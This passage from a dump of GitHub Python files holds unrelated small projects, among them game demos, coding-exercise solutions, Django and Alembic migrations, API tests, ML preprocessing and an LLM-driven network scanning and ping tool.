even_assists)\n\n with open('most_players_stats.csv', 'a+', newline='', encoding=\"utf-8\") as new_file:\n csv_writer = csv.writer(new_file)\n csv_writer.writerow([odd_name, odd_appearances, odd_goals, odd_assists])\n csv_writer.writerow([even_name, even_appearances, even_goals, even_assists])\n\n\n# github.com/arutselvanManivannan\n","repo_name":"ArutselvanManivannan/Web_Scraping_Repo","sub_path":"Requests-Html/Manchester United/Fergie Time/most_players_stats.py","file_name":"most_players_stats.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39516572710","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n 
migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('instance', '__first__'),\n ('idc', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Volume',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=128, verbose_name='Volume name')),\n ('volume_id', models.CharField(max_length=128, null=True, verbose_name='OS Volume UUID')),\n ('size', models.IntegerField(verbose_name='Volume size')),\n ('volume_type', models.IntegerField(default=0, verbose_name='Volume Type', choices=[(0, 'Capacity'), (1, 'Performance')])),\n ('status', models.IntegerField(default=0, verbose_name='Status', choices=[(0, 'Volume Creating'), (1, 'Volume Attaching'), (2, 'Volume Available'), (3, 'Volume Backing_up'), (4, 'Volume Deleting'), (5, 'Volume Downloading'), (6, 'Volume Error'), (7, 'Volume Error_deleting'), (8, 'Volume Error_restoring'), (9, 'Volume In Use'), (10, 'Volume Restoring_backup'), (12, 'Volume Unrecognized'), (11, 'Volume uploading')])),\n ('create_date', models.DateTimeField(auto_now_add=True, verbose_name='Create Date')),\n ('deleted', models.BooleanField(default=False, verbose_name='Deleted')),\n ('instance', models.ForeignKey(blank=True, to='instance.Instance', null=True)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ('user_data_center', models.ForeignKey(to='idc.UserDataCenter')),\n ],\n options={\n 'ordering': ['-create_date'],\n 'db_table': 'volume',\n 'verbose_name': 'Volume',\n 'verbose_name_plural': 'Volume',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"eoncloud-dev/eonboard","sub_path":"eoncloud_web/biz/volume/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"4114521118","text":"def leiaInt(msg):\n while True:\n try:\n n = int(input(msg))\n return f'{n}'\n except (ValueError, TypeError):\n print ('\\033[01:31mErro! O valor digitado não é válido!\\033[m')\n except (KeyboardInterrupt):\n print ('\\033[01:33mO usuário preferiu não digitar!\\033[m')\n return 0\n\ndef leiaFloat(msg1):\n while True:\n try:\n r = float(input(msg1))\n return f'{r}'\n except (ValueError, TypeError):\n print('\\033[01:31mErro! 
O valor digitado não é válido!\033[m')\n        except (KeyboardInterrupt):\n            print ('\\033[01;33mO usuário preferiu não digitar!\\033[m')\n            return 0\n\n\nn = leiaInt('Digite um número inteiro: ')\nr = leiaFloat('Digite um número real: ')\nprint(f'O número inteiro digitado foi o {n} e o real foi o {r}.')\n","repo_name":"mfre1re/Diversas-atividades-em-Python","sub_path":"Atividades - Python/Exerc.073 - Funções e Tratamento de Erros em Python.py","file_name":"Exerc.073 - Funções e Tratamento de Erros em Python.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"20472628866","text":"import pygame\n\nWIDTH = 640\nHEIGHT = 480\n\npygame.init()\nwindow = pygame.display.set_mode((WIDTH, HEIGHT))\n\nball = pygame.image.load(\"ball.png\")\nw = ball.get_width()\nh = ball.get_height()\n\nx, velocity_x = w, 2\ny, velocity_y = h, 2\n\nclock = pygame.time.Clock()\n\n\nwhile True:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            exit()\n\n    window.fill((0, 0, 0))\n    window.blit(ball, (x, y))\n    pygame.display.flip()\n\n    x += velocity_x\n    y += velocity_y\n\n    if y <= 0:\n        velocity_y *= -1\n\n    if x <= 0:\n        velocity_x *= -1\n\n    if y + h >= HEIGHT:\n        velocity_y *= -1\n\n    if x + w >= WIDTH:\n        velocity_x *= -1\n\n    clock.tick(60)\n","repo_name":"voizlav/BSCS1002","sub_path":"part13/86_bouncing_ball/bouncing_ball.py","file_name":"bouncing_ball.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"35508876213","text":"from typing import List\nfrom collections import deque\n\n\"\"\"\nThere are only two fundamental data structures. First is Array and second is LinkedList.\n\nLet's talk about LinkedList now.\n\"\"\"\n\nclass ListNode:\n    def __init__(self, val: int, next: \"ListNode\" = None):\n        self.val = val\n        self.next = next\n\ndef listToLinkedList(list: List[int]) -> ListNode:\n    def append(node: ListNode, nextVal: int) -> ListNode:\n        node.next = ListNode(nextVal)\n        return node.next\n    list = deque(list)\n    head = ListNode(list.popleft())\n    current = head\n    while list:\n        current = append(current, list.popleft())\n    return head\n\ndef printLinkedList(head: ListNode):\n    current = head\n    while current:\n        print(current.val)\n        current = current.next\n\n\"\"\"\nPreorder LinkedList Traversal\n\"\"\"\n\ndef preorder(head: ListNode):\n    if head:\n        # do something first on the current node\n        print(head.val)\n        # then process the rest\n        preorder(head.next)\n\n\"\"\"\nPostorder LinkedList Traversal\n\"\"\"\n\ndef postorder(head: ListNode):\n    if head:\n        # traverse next first till the end\n        postorder(head.next)\n        # then only process the current node\n        print(head.val)\n\nif __name__ == \"__main__\":\n    ll = listToLinkedList(list(range(10)))\n    # printLinkedList(ll)\n\n    preorder(ll)\n    postorder(ll)\n\n\n\n\n\n    ","repo_name":"lamida/algorithms-drills","sub_path":"traversal/linked_list_traversal.py","file_name":"linked_list_traversal.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"44489053855","text":"from tkinter import *\nimport requests\n\nFONT = (\"Ariel\", 20, \"bold\")\n\n\ndef change_quote():\n    response = requests.get(url=\"https://api.kanye.rest\")\n    response.raise_for_status()\n    data = response.json()\n    quote = data[\"quote\"]\n    canvas.itemconfig(canvas_text, text=quote)\n\n\nwindows = Tk()\nwindows.title(\"Kanye 
says...\")\nwindows.config(padx=50, pady=50)\n\ncanvas = Canvas(width=300, height=414)\nbackground_img = PhotoImage(file=\"background.png\")\ncanvas.create_image(151.5, 207, image=background_img)\ncanvas_text = canvas.create_text(150, 207, text=\" To know what Kanye says, press on the picture of Kanye 👇\", width=250, font=FONT, fill=\"white\")\ncanvas.grid(row=0, column=0)\n\nkanye_img = PhotoImage(file=\"kanye.png\")\nkanye_button = Button(height=131, width=100, image=kanye_img, highlightthickness=0, command=change_quote)\nkanye_button.grid(row=1, column=0)\nwindows.mainloop()\n","repo_name":"koshtiakanksha/kanye_quotes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"41135616389","text":"import os\nimport sys\npath=os.path.abspath(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, path)\nfrom Utils.Functions import process_file,valid_hash,clean_hash\nfrom PackageControl.PackageController import *\n\ndef generic_process_hash(hash_str):\n hash_str = clean_hash(hash_str)\n if(not valid_hash(hash_str)):\n return None\n if(len(hash_str)==32):\n hash_str=get_file_id(hash_str)\n if(hash_str is not None):\n return process_file(hash_str)\n else :\n return None\n","repo_name":"Stasonhub/codex-backend","sub_path":"src/process_hash.py","file_name":"process_hash.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"31943415714","text":"import os\nfrom fastapi import FastAPI, HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nimport openai\nimport logging\nfrom pydantic import BaseModel\nfrom fastapi.responses import StreamingResponse\nfrom network.network_scanning import network_scan\nfrom network.packet_capture import capture_packets\nfrom network.ping_utils import ping_host\nfrom network.ip_utils import get_own_subnet, get_ip_address\nfrom dotenv import load_dotenv\nfrom time import sleep\nimport json\n\nload_dotenv()\nlogging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s', filename='logs.log')\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\ndef chat_with_openai(messages, model, function_call=\"auto\"):\n signature_network_scan = {\n \"name\": \"network_scan\",\n \"description\": \"Perform a network scan using nmap if the user wants a network scan\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"hosts\": {\n \"type\": \"string\",\n \"description\": \"The host(s) to scan, can be a single IP, a range, or a subnet\"\n },\n \"arguments\": {\n \"type\": \"string\",\n \"description\": \"The arguments to pass to nmap, such as scan type and options available in nmap\"\n },\n \"own_network\": {\n \"type\": \"boolean\",\n \"description\": \"Detect if the user intends to scan their own network, otherwise set this to false\"\n }\n },\n \"required\": []\n }\n }\n signature_capture_packets = {\n \"name\": \"capture_packets\",\n \"description\": \"Capture network packets for and aggregate them\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"duration\": {\n \"type\": \"integer\",\n \"description\": \"Duration in seconds for which to capture packets\",\n \"default\": 5\n }\n },\n \"required\": []\n }\n }\n\n signature_ping = {\n \"name\": \"ping_host\",\n \"description\": \"Ping a specified host to check its reachability\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n 
\"host\": {\n \"type\": \"string\",\n \"description\": \"The host to ping\"\n },\n \"count\": {\n \"type\": \"integer\",\n \"description\": \"Number of echo requests to send\",\n \"default\": 4\n }\n },\n \"required\": [\"host\"]\n }\n }\n signature_get_ip = {\n \"name\": \"get_ip_address\",\n \"description\": \"Get my own IP address\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {},\n \"required\": []\n }\n }\n try:\n logging.info('Calling GPT API...')\n res = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n functions=[signature_network_scan, signature_capture_packets, signature_ping, signature_get_ip],\n function_call=function_call\n )\n return res\n except Exception as e:\n raise HTTPException(status_code=500, detail=str(e))\n\ndef estimate_token_count(message):\n words = message.split()\n return len(words) * 4\n\ndef limit_context_to_max_tokens(messages, max_tokens=10000):\n limited_messages = []\n total_tokens = 0\n for message in reversed(messages):\n msg_token_count = estimate_token_count(message[\"content\"])\n if total_tokens + msg_token_count <= max_tokens:\n total_tokens += msg_token_count\n limited_messages.append(message)\n else:\n break\n return list(reversed(limited_messages))\n\ndef log_streamer():\n with open('logs.log', 'r') as f:\n f.seek(0, 2)\n while True:\n line = f.readline()\n if not line:\n sleep(0.1)\n continue\n yield f\"data: {line}\\n\\n\"\n\nclass Message(BaseModel):\n message: list\n model: str\n\nasync def networkgpt(message_data: Message):\n message = message_data.message\n model = message_data.model\n messages = limit_context_to_max_tokens(message)\n llm_system_prompt = \"\"\"You are Network GPT, a virtual assistant with the capability to process text requests and perform specific network functions. 
\nIf the last user message explicitly requests a network scan, invoke the 'network_scan' function to initiate the scan.\nIf the last user message explicitly requests to capture their packets, invoke the 'capture_packets' function to initiate the capturing.\nIf the last user message explicitly requests to ping, invoke the 'ping_host' function to ping a host.\nIf the last user message explicitly requests their own IP address, invoke the 'get_ip_address' function to get their IP.\nOtherwise, respond with appropriate information or guidance based on the user's request.\"\"\"\n messages.insert(0, {\"role\": \"system\", \"content\": llm_system_prompt})\n res = chat_with_openai(messages, model)\n response = res[\"choices\"][0][\"message\"]\n if response.get(\"function_call\"):\n function_name = response[\"function_call\"][\"name\"]\n function_results = {}\n args = json.loads(response[\"function_call\"][\"arguments\"])\n if function_name == \"network_scan\":\n if args.get(\"own_network\"):\n hosts = get_own_subnet()\n else:\n hosts = args.get(\"hosts\", get_own_subnet())\n scan_results = network_scan(\n hosts=hosts,\n arguments=args.get(\"arguments\", \"\")\n )\n function_results['scan'] = scan_results\n if function_name == \"capture_packets\":\n logging.info(f\"Capturing packets for {args.get('duration', 5)} seconds\")\n packet_results = capture_packets(duration=args.get(\"duration\", 5))\n function_results['packet_results'] = packet_results\n if function_name == \"ping_host\":\n logging.info(f\"Sending {args.get('count')} requests to {args.get('host')}\")\n ping_results = ping_host(host=args.get(\"host\"), count=args.get(\"count\", 4))\n function_results['ping_results'] = ping_results\n if function_name == \"get_ip_address\":\n ip_results = get_ip_address()\n function_results['my_ip'] = ip_results\n return {\"response\": json.dumps(function_results)}\n else:\n return {\"response\": res[\"choices\"][0][\"message\"][\"content\"]}\n\nasync def stream_logs():\n logging.info('Streaming logs')\n return StreamingResponse(log_streamer(), media_type=\"text/event-stream\")","repo_name":"k4l1sh/network-gpt","sub_path":"backend/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"16733577292","text":"import pygame\nfrom random import randint\nclass Asteroide(pygame.sprite.Sprite):\n\tvelocidad = 5\n\tdef __init__(self,posx,posy):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.listaimagenes = []\n\t\tself.vida = True\n\t\tfor each in ['./Imagenes/Asteroides/ASTEROID%s.PNG'%x for x in range(0,5)]:\n\t\t\tif each != None:\n\t\t\t\tself.listaimagenes.append(pygame.image.load(each).convert())\n\t\tself.rand = randint(0,3)\n\t\tself.rect = self.listaimagenes[self.rand].get_rect()\n\t\tself.rect.left = posx\n\t\tself.rect.top = posy\n\n\tdef dibujar(self,superficie):\n\t\tsuperficie.blit(self.listaimagenes[self.rand],(self.rect.left,self.rect.top))","repo_name":"Sturm0/Pygame-Space-Invaders-Amenaza-Espacial","sub_path":"Asteroide.py","file_name":"Asteroide.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16063813164","text":"'''Lv.2 다음 큰 숫자'''\r\n\r\n# 문제 : https://school.programmers.co.kr/learn/courses/30/lessons/12911\r\n\r\n\r\n# 풀이 1\r\ndef solution(n):\r\n n1_1 = bin(n)[2:].count('1')\r\n \r\n while(True):\r\n n += 1\r\n n2_1 = bin(n)[2:].count('1')\r\n if n1_1 == 
n2_1: return n","repo_name":"Taeho25/Algorithm","sub_path":"Programmers/Lv.2/다음 큰 숫자.py","file_name":"다음 큰 숫자.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"}
{"seq_id":"20762581355","text":"'''\nProblem ID:\nPE0006\n\nProblem Title:\nSum square difference\n\nProblem Description:\nThe sum of the squares of the first ten natural numbers is,\n1**2+2**2+...+10**2=385\nThe square of the sum of the first ten natural numbers is,\n(1+2+...+10)**2=3025\nHence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is\n3025-385=2640.\nFind the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.\n\nProblem Solution:\n25164150\n'''\n\ndef solution(max):\n    result = 0\n    a = 0\n    for number in range(1,1+max):\n        result -= number**2\n        a += number\n    result += a**2\n    return result\n\nprint(solution(100))","repo_name":"villocan/project-euler-solutions","sub_path":"Problem_0006.py","file_name":"Problem_0006.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"17828469155","text":"from odp.api.core.wrappers import OpenDotaClient\nimport requests_mock\n\nURL = 'https://api.opendota.com/api/teams/'\ntest_team_data = {\n    \"team_id\": 1234,\n    \"rating\": 1.2,\n    \"wins\": 1,\n    \"losses\": 1,\n    \"last_match_time\": 1111,\n    \"name\": \"TestTeam\",\n    \"tag\": \"TT\",\n    \"logo_url\": \"https://fake.png\"\n}\n\n\ndef test_get_team():\n    client = OpenDotaClient()\n    with requests_mock.mock() as mock:\n        mock.get(URL, json=[test_team_data])\n        res = client.get_team_by_name('TestTeam')\n    assert len(res) == 8\n    assert res['team_id'] == 1234\n\n\ndef test_get_fake_team():\n    client = OpenDotaClient()\n    with requests_mock.mock() as mock:\n        mock.get(URL, json=[test_team_data])\n        res = client.get_team_by_name('FakeTestTeam')\n    assert res is None\n","repo_name":"MaksymMartyniak/OpenDotaProject","sub_path":"tests/test_get_team_wrapper.py","file_name":"test_get_team_wrapper.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"27368126588","text":"print(f'Hello from {__file__}')\n\nimport pandas as pd\nimport numpy as np\nimport os\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import OneHotEncoder\n\nX = pd.read_csv('./data/raw/train/Train.csv', delimiter=',')\ny = pd.read_csv('./data/raw/train/Target.csv', delimiter=',')\nX_kaggle = pd.read_csv('./data/raw/test/Test.csv', delimiter=',')\nX_full = pd.concat([X, X_kaggle], sort=False, axis=0)\n\ncat_columns = ['code', 'period', 'id', 'Country']\nnum_columns = ['year', 'tourists', 'venue', 'rate', 'food',\n               'glass', 'metal', 'other', 'paper', 'plastic',\n               'leather', 'green_waste', 'waste_recycling']\n\nX_full_num = X_full[num_columns].copy()\nX_full_cat = X_full[cat_columns].copy()\n\nscaler = MinMaxScaler().fit(X_full_num)\nX_full_num_tr = scaler.transform(X_full_num)\nX_full_num_tr = pd.DataFrame(X_full_num_tr, columns=num_columns)\n\nonehot = OneHotEncoder().fit(X_full_cat)\nX_full_cat_tr = onehot.transform(X_full_cat).toarray()\nX_full_cat_tr = pd.DataFrame(X_full_cat_tr)\n\nX_full_tr = pd.concat([X_full_num_tr, X_full_cat_tr], sort=False, axis=1)\n\nX_tr = X_full_tr.iloc[:X.shape[0],:]\nX_kaggle_tr = 
X_full_tr.iloc[X.shape[0]:,:]\n\n\nX_train, X_test, y_train, y_test = train_test_split(\n X_tr, y['polution_clf'], test_size=0.01, random_state=42)\n\n\npath = './data/processed/'\nif not os.path.exists(path):\n os.mkdir(path)\n\nX_train.to_csv('./data/processed/X_train.csv')\nX_test.to_csv('./data/processed/X_test.csv')\ny_train.to_csv('./data/processed/y_train.csv')\ny_test.to_csv('./data/processed/y_test.csv')\nX_kaggle_tr.to_csv('./data/processed/X_for_kaggle.csv')\n","repo_name":"moriys/mlops_task1_pipeline","sub_path":"model_preprocessing.py","file_name":"model_preprocessing.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17960766045","text":"# Ryan Blakeman\n# CST 205\n# Project1.pys\n# github.com/rblakeman/CST205-Project1\n\nfrom PIL import Image, ImageFilter\n\ndef medianOdd(myList):\n listLength = len(myList)\n sortedValues = sorted(myList)\n middleIndex = (int)((listLength + 1)/2) - 1\n return sortedValues[middleIndex]\n\n\ntheImages = list()\n\nredPixelList = list()\ngreenPixelList = list()\nbluePixelList = list()\n\ntry:\n for i in range(1,9):\n theImages.append(Image.open(str(i)+\".png\"))\nexcept:\n print (\"Failed to load\")\n\nnewImage = Image.new(\"RGB\", theImages[1].size, (255,255,255))\nnewImagedata = newImage.load()\n\nprint (\"The size of the images are: \")\nprint (theImages)\n\npictureWidth = theImages[1].size[0]\npictureHeight = theImages[1].size[1]\n\nfor x in range(0,pictureWidth):\n for y in range(0, pictureHeight):\n for myImage in theImages:\n myRed, myGreen, myBlue = myImage.getpixel((x,y))[:3]\n # [:3] for transparancy channel\n redPixelList.append(myRed)\n greenPixelList.append(myGreen)\n bluePixelList.append(myBlue)\n\n newred = medianOdd(redPixelList)\n newgreen = medianOdd(greenPixelList)\n newblue = medianOdd(bluePixelList)\n\n newImagedata[x,y] = (newred, newgreen, newblue)\n\n redPixelList.clear()\n greenPixelList.clear()\n bluePixelList.clear()\n\nnewImage.save(\"new.png\")\n","repo_name":"rblakeman/CST205-Project1","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33917246316","text":"r\"\"\"\nGiven a List of words, return the words that can be typed using letters of alphabet on only \none row's of American keyboard like the image below.\n\nhttps://assets.leetcode.com/uploads/2018/10/12/keyboard.png\n \nExample:\n\n Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]\n Output: [\"Alaska\", \"Dad\"]\n\nNote:\n You may use one character in the keyboard more than once.\n You may assume the input string will only contain letters of alphabet.\n\"\"\"\n\n\nclass Solution:\n def findWords1(self, words):\n d = {\n 'q': 1, 'w': 1, 'e': 1, 'r': 1, 't': 1, 'y': 1, 'u': 1, 'i': 1, 'o': 1, 'p': 1, \n 'a': 2, 's': 2, 'd':2, 'f': 2, 'g': 2, 'h': 2, 'j': 2, 'k': 2, 'l': 2, \n 'z': 3, 'x': 3, 'c': 3, 'v': 3, 'b': 3, 'n': 3, 'm': 3\n }\n\n res = []\n for s in words:\n letters = set(s.lower())\n row = d[letters.pop()]\n flag = True\n for letter in letters:\n if d[letter] != row:\n flag = False\n break\n \n if flag:\n res.append(s)\n \n return res\n\n def findWords2(self, words):\n row1 = set('qwertyuiop')\n row2 = set('asdfghjkl')\n row3 = set('zxcvbnm')\n res = []\n for s in words:\n tmp = set(s.lower())\n if not ((tmp - row1) and (tmp - row2) and (tmp - row3)):\n res.append(s)\n \n return 
res\n","repo_name":"chaosWsF/Python-Practice","sub_path":"leetcode/0500_keyboard_row.py","file_name":"0500_keyboard_row.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7030026511","text":"\"\"\"empty message\n\nRevision ID: ed60bf4996df\nRevises: 41c26af3cd58\nCreate Date: 2020-11-18 20:03:09.497973\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ed60bf4996df'\ndown_revision = '41c26af3cd58'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_foreign_key(None, 'group', 'user', ['group_admin'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'group', type_='foreignkey')\n # ### end Alembic commands ###\n","repo_name":"SamuelJMiller/group-scheduler","sub_path":"migrations/versions/ed60bf4996df_.py","file_name":"ed60bf4996df_.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41525720186","text":"from kivymd.uix.card import MDCard\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import MDFillRoundFlatIconButton,MDRoundFlatIconButton\nfrom kivymd.uix.snackbar import Snackbar\nfrom kivy.clock import Clock\nfrom pydantic import ValidationError\n\nfrom modules.moduleDetailsArticle.detailsArticle import DetailsArticleScreen\n\n\nfrom common.entities.article_entity import ArticleEntity\nfrom common.database.firebase import articles\nfrom common.values import strings\n\nclass InventoryMDCard(MDCard):\n listArticle: articles = articles\n def __init__(self, **kw) -> None:\n super(InventoryMDCard,self).__init__(**kw)\n Clock.schedule_once(lambda *kargs:self.getArticles())\n \n def addItemRecycleView(self,article:ArticleEntity):\n self.ids.recycle_view_articles.data.append({\n \"listener\":self,\n \"article\":article,\n \"codeBar\":article.id,\n \"photoUrl\":article.photoUrl,\n \"name\":article.name,\n \"amount\":article.amount.__str__(),\n \"price\":article.price.__str__()\n }\n )\n def getArticles(self):\n self.ids.recycle_view_articles.data = []\n self.listArticle = articles.getAllArticles()\n \n for article in self.listArticle:\n self.addItemRecycleView(article)\n \n \n def filterArticles(self):\n self.ids.recycle_view_articles.data = []\n codeBar = self.ids.text_field_code_bar.text.__str__()\n if codeBar.__len__() > 0:\n for article in articles.getAllArticles():\n if codeBar in article.id or codeBar in article.name:\n self.addItemRecycleView(article) \n else:\n self.getArticles()\n \n\n def addArticle(self):\n detailsArticle = DetailsArticleScreen()\n self.dialog = MDDialog(\n title = strings.title_create_article,\n type = \"custom\",\n content_cls = detailsArticle,\n buttons = [\n MDRoundFlatIconButton(\n icon = \"exit-run\",\n text = \"Cancelar\",\n on_press = self.dialogClose\n ),\n MDFillRoundFlatIconButton(\n icon = \"content-save-all\",\n text = \"Guardar\",\n on_press = self.validateArticle\n )\n ]\n )\n self.dialog.open()\n \n\n def dialogClose(self, *args):\n self.dialog.dismiss(force=True)\n\n def validateArticle(self,*args):\n try:\n articleEntity = ArticleEntity(\n id = self.dialog.content_cls.ids.text_field_code_bar.text,\n name = self.dialog.content_cls.ids.text_field_name.text,\n description = 
self.dialog.content_cls.ids.text_field_description.text,\n photoUrl = self.dialog.content_cls.ids.text_field_photo_url.text,\n price = float (self.dialog.content_cls.ids.text_field_price.text),\n amount = float(self.dialog.content_cls.ids.text_field_amount.text),\n offSale = float(self.dialog.content_cls.ids.text_field_off_sale.text),\n shelf = self.dialog.content_cls.ids.text_field_shelf.text,\n vertical = self.dialog.content_cls.ids.text_field_vertical.text,\n horizontal = self.dialog.content_cls.ids.text_field_horizontal.text,\n category = self.dialog.content_cls.ids.drop_down_item_category.text\n )\n if self.dialog.content_cls.isEdit == True:\n self.updateArticleInventory(articleEntity)\n self.getArticles()\n else:\n if articles.existsArticle(articleEntity.id):\n dialog = MDDialog(title = strings.msg_error,text = strings.msg_article_exists)\n dialog.open()\n else:\n articles.saveArticle(articleEntity)\n self.getArticles()\n Snackbar(text=strings.msg_save_success_article).open()\n self.dialogClose()\n\n except ValidationError as error:\n dialog = MDDialog(title = strings.msg_error,text = error.errors.__str__())\n dialog.open()\n \n\n\n\n\n\n ####################\n ## InventoryAux\n ####################\n def deleteArticleInventory(self,article:ArticleEntity):\n print(\"delete article firebase\", article.id)\n if articles.deleteArticle(article):\n Snackbar(text=strings.msg_success_delete_article).open()\n self.getArticles()\n else:\n Snackbar(text=strings.msg_error_delete_article).open()\n\n def updateArticleInventory(self,article:ArticleEntity):\n if articles.updateArticle(article):\n Snackbar(text=strings.msg_success_update_article).open()\n else:\n Snackbar(text=strings.msg_error_delete_article).open()\n \n def openEditArticle(self,article:ArticleEntity):\n detailsArticle = DetailsArticleScreen(article)\n self.dialog = MDDialog(\n title = strings.title_edit_article,\n type = \"custom\",\n content_cls = detailsArticle,\n buttons = [\n MDRoundFlatIconButton(\n icon = \"exit-run\",\n text = \"Cancelar\",\n on_press = self.dialogClose\n ),\n MDFillRoundFlatIconButton(\n icon = \"content-save-all\",\n text = \"Guardar\",\n on_press = self.validateArticle\n )\n ]\n )\n self.dialog.open()","repo_name":"saulkali/POSKivy","sub_path":"modules/moduleInventory/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23142757981","text":"import pytest\nfrom faust.cli.completion import completion\nfrom mode.utils.mocks import patch\n\n\nclass test_completion:\n\n @pytest.fixture()\n def command(self, *, context):\n return completion(context)\n\n @pytest.mark.asyncio\n async def test_run(self, *, command):\n with patch('faust.cli.completion.click_completion') as cc:\n await command.run()\n cc.get_code.assert_called_once_with(shell=command.shell())\n\n @pytest.mark.asyncio\n async def test_run__no_completion(self, *, command):\n with patch('faust.cli.completion.click_completion', None):\n with pytest.raises(command.UsageError):\n await command.run()\n","repo_name":"robinhood/faust","sub_path":"t/unit/cli/test_completion.py","file_name":"test_completion.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":6634,"dataset":"github-code","pt":"76"} +{"seq_id":"27308083","text":"from PyQt5.QtCore import QSortFilterProxyModel\nfrom PyQt5.QtWidgets import QDockWidget, QHeaderView, QLabel\n\nfrom 
app.mainwindow.queuetablemodel import QueueTableModel\nfrom app.parser import outputparser\nfrom app.ui.ui_queue import Ui_QueueDock\nfrom app.uiutils import (\n get_max_text_width, TABLE_WIDTH_PADDING, TABLE_HEIGHT_PADDING\n)\n\n\nclass QueueDock(QDockWidget, Ui_QueueDock):\n CONFIG_QUEUE_FILTER_STATE_KEY = 'mainWindow/queue/filterCheckState'\n\n def __init__(self, parent, sender):\n \"\"\"Constructor\n\n :param QWidget parent: parent of the QueueDock\n :param app.sender.QtSender sender: QtSender instance\n \"\"\"\n super().__init__(parent)\n self._sender = sender\n self.setupUi(self)\n self._init_table()\n sender.queue_paused.connect(self.on_paused)\n\n def _init_table(self):\n source_model = QueueTableModel(self._sender, self)\n model = QSortFilterProxyModel(self)\n model.setSourceModel(source_model)\n model.setFilterKeyColumn(1) # module column\n self.table.setModel(model)\n\n self.table.horizontalHeader().setSectionResizeMode(\n QHeaderView.Fixed)\n # Resize columns basing on maximum contents widths\n fm = self.table.fontMetrics()\n # We don't expect the number of requests to exceed 1M\n self.table.horizontalHeader().resizeSection(\n 0, fm.width('000000') + TABLE_WIDTH_PADDING)\n self.table.horizontalHeader().resizeSection(1, get_max_text_width(\n fm, self.get_known_queue_modules()) + TABLE_WIDTH_PADDING)\n # Row height\n self.table.verticalHeader().setDefaultSectionSize(\n fm.height() + TABLE_HEIGHT_PADDING)\n\n @staticmethod\n def get_known_queue_modules():\n \"\"\"Get names of all app modules that sends requests via Sender\"\"\"\n return ([cls.__name__ for cls in outputparser.PARSERS] +\n ['Analyzer', 'GSInfoDialog', 'VideoIDDialog', 